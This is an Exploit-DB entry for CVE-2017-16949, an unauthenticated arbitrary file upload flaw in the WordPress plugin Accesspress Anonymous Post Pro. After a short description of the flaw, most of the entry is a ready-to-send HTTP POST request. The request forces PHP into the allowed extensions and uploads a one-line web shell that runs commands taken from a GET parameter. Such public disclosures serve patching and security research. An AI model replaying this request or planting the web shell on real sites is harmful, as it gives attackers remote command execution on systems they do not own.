Accesspress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload

EDB-ID: 43324
Author: Colette Chamberland
Published: 2017-12-12
CVE: CVE-2017-16949
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: November 12, 2017 
# Exploit Author: Colette Chamberland
# Author contact: [email protected]
# Author homepage:
# Vendor Homepage:
# Software Link:
# Version: < 3.2.0
# Tested on: Wordpress 4.x
# CVE : CVE-2017-16949

Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows
the attacker to upload anything they want, bypassing the filters.


POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6;
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>


Related Posts